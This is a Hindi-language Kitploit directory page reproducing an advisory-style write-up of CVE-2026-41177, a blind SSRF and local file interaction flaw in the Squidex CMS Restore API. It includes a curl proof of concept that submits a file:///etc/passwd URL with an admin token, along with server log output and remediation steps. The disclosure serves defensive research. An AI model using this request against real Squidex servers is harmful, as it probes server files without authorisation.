Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, Squidex CMS (v7.23.0 से पहले) में एक ब्लाइंड SSRF भेद्यता। इसमें मूल कारण विश्लेषण, पुनरुत्पादन चरण, और लोकल फ़ाइल इंटरैक्शन (LFI) के संबंध में प्रभाव आकलन शामिल है। | Kitploit
उपकरण/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
भेद्यता विश्लेषणशोषणवेब सुरक्षालर्निंग और शिक्षा
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, Squidex CMS (v7.23.0 से पहले) में एक ब्लाइंड SSRF भेद्यता। इसमें मूल कारण विश्लेषण, पुनरुत्पादन चरण, और लोकल फ़ाइल इंटरैक्शन (LFI) के संबंध में प्रभाव आकलन शामिल है।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41177: Squidex CMS ब्लाइंड SSRF

CVE-2026-41177 के लिए तकनीकी शोध और विश्लेषण: Squidex CMS Restore API में एक ब्लाइंड सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता।

भेद्यता अवलोकन

  • CVE ID: CVE-2026-41177
  • प्रभावित घटक: Squidex API: Backup / Restore Engine (/api/apps/restore)
  • प्रभावित संस्करण: < 7.23.0
  • भेद्यता प्रकार: ब्लाइंड SSRF (CWE-918), लोकल फाइल इंटरैक्शन (CWE-73)

सारांश

Squidex Restore API ब्लाइंड सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) के प्रति संवेदनशील है। एप्लिकेशन उपयोगकर्ता द्वारा प्रदान किए गए Url पैरामीटर के URI स्कीम को सत्यापित करने में विफल रहता है, जिससे file:// प्रोटोकॉल का उपयोग संभव हो जाता है। यह एक प्रमाणित व्यवस्थापक को बैकएंड सर्वर को लोकल फाइलसिस्टम के साथ इंटरैक्ट करने के लिए मजबूर करने की अनुमति देता है, जिससे लोकल फाइल इंटरैक्शन (LFI) और आंतरिक लॉग के साइड-चैनल विश्लेषण के माध्यम से संवेदनशील सिस्टम जानकारी का संभावित प्रकटीकरण होता है।

विवरण

  1. कॉन्फ़िगरेशन: एक हमलावर लोकल फाइलसिस्टम URI (जैसे, ) का उपयोग करके एक "Restore" जॉब बनाता है।
file:///etc/passwd
  • ट्रिगर: हमलावर restore एंडपॉइंट पर POST अनुरोध सबमिट करता है।
  • निष्पादन: बैकएंड अनुरोध स्वीकार करता है और URL को एक बैकग्राउंड वर्कर (RestoreJob) को पास करता है।
  • अवलोकन: जबकि API प्रतिक्रिया एक सामान्य 204 No Content है, आंतरिक सर्वर लॉग से पता चलता है कि सर्वर ने फ़ाइल को सफलतापूर्वक खोला और पढ़ा, इससे पहले कि सामग्री मान्य ZIP संग्रह न होने के कारण विफल हो जाती।
  • प्रूफ ऑफ कॉन्सेप्ट (PoC)

    1. दुर्भावनापूर्ण अनुरोध

    निम्नलिखित curl कमांड चलाएँ (<TOKEN> को एक मान्य व्यवस्थापक टोकन से बदलें):

    root@kitploit:~
    curl -X POST http://localhost/api/apps/restore/ \
      -H 'Authorization: Bearer <TOKEN>' \
      -H 'Content-Type: application/json' \
      -d '{
        "Url": "file:///etc/passwd",
        "Name": "exploit-poc"
      }' -v
    

    2. लॉग के माध्यम से सत्यापन

    Squidex कंटेनर लॉग में निम्नलिखित त्रुटि आंतरिक फ़ाइल इंटरैक्शन की पुष्टि करती है:

    root@kitploit:~
    {
      "logLevel": "Error",
      "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
      "exception": {
        "type": "System.IO.InvalidDataException",
        "message": "End of Central Directory record could not be found.",
        "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
      }
    }
    

    नोट: InvalidDataException पुष्टि करता है कि सर्वर ने फ़ाइल के बाइट्स को सफलतापूर्वक एक्सेस और पढ़ा।

    प्रभाव

    यह भेद्यता प्रमाणित हमलावरों को अनुमति देती है:

    • फाइलसिस्टम टोही: संवेदनशील फ़ाइलों (जैसे, appsettings.json, सीक्रेट्स) की उपस्थिति की पुष्टि करें।
    • सूचना प्रकटीकरण: मल्टी-टेनेंट वातावरण में, इसका उपयोग संभावित रूप से अन्य उपयोगकर्ताओं की बैकअप फ़ाइलों तक पहुँचने के लिए किया जा सकता है।

    उपचार

    • अपडेट: Squidex संस्करण 7.23.0 या बाद में अपग्रेड करें।
    • प्रोटोकॉल व्हाइटलिस्टिंग: केवल http:// और https:// स्कीम को सख्ती से अनुमति दें।
    • इनपुट सत्यापन: प्रसंस्करण से पहले file:// स्कीम का उपयोग करने वाले किसी भी URI को अस्वीकार करने के लिए एक जाँच लागू करें।
    • सुरक्षित IO हैंडलिंग: सुनिश्चित करें कि अंतर्निहित हैंडलर उपयोगकर्ता-प्रदत्त इनपुट के लिए लोकल फाइलसिस्टम रिज़ॉल्यूशन से प्रतिबंधित हैं।

    संदर्भ

    • GitHub सुरक्षा सलाह (GHSA-45fq-w37p-qfw5)
    • आधिकारिक CVE रिकॉर्ड
    टूल डाउनलोड करें